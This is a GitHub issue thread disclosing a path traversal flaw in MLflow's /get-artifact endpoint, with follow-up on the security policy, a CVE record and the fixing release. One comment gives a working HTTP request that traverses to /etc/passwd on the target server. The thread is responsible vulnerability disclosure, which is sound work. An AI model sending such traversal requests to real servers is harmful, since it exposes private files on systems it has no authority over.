### ISSUE TITLE
[BUG] Security Vulnerability

### ISSUE THREAD

**Issue by y4ppieflu** [mlflow/mlflow#7166]
**Vulnerability details**
Local file inclusion in the MLFlow server, additional details may be provided upon request.
**MLFlow version**
Reproduced in 1.26.1 and 1.30.0

**Comment by harupy** [comment]
@y4ppieflu Can you provide more details?

**Comment by y4ppieflu** [comment]
@harupy 
Sure, the vulnerability allows to read arbitrary files on the server where mlflow is running due to incorrect handling of the `path` parameter passed to the `/get-artifact` endpoint. Using path traversal it is possible to access files outside of the default artifacts root folder. For example the following request would return the contents of the `/etc/passwd` of the target server:
```
GET /get-artifact?path=../../../../../../etc/passwd&run_uuid=<run_uuid> HTTP/1.1
Host: localhost:5000
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close


```
<img width="1182" alt="image" src="https://user-images.githubusercontent.com/6201310/197962851-94b964af-9f52-45ca-b4cf-3d8f0c490be6.png">

**Comment by y4ppieflu** [comment]
Thanks @harupy 
I am hiding the above details for now.

**Comment by harupy** [comment]
Thank you!

**Comment by y4ppieflu** [comment]
BTW — shall this follow the process described in the [Security Policy](https://github.com/mlflow/mlflow/security/policy) and have an associated [Github Security Advisory](https://docs.github.com/en/code-security/repository-security-advisories/creating-a-repository-security-advisory)?

**Comment by y4ppieflu** [comment]
> BTW — shall this follow the process described in the [Security Policy](https://github.com/mlflow/mlflow/security/policy) and have an associated [Github Security Advisory](https://docs.github.com/en/code-security/repository-security-advisories/creating-a-repository-security-advisory)?

@harupy hi, what about my comment above?

**Comment by y4ppieflu** [comment]
Hi @harupy
kind reminder :)

**Comment by y4ppieflu** [comment]
CVE record for this issue is now published ([CVE-2023-30172](https://www.cve.org/CVERecord?id=CVE-2023-30172))

MLflow v2.0.1 fixes the vulnerability.

**Comment by noren95** [comment]
Does 2.0.1? I see that it was merged into 2.0.0 as well. Can you please confirm?
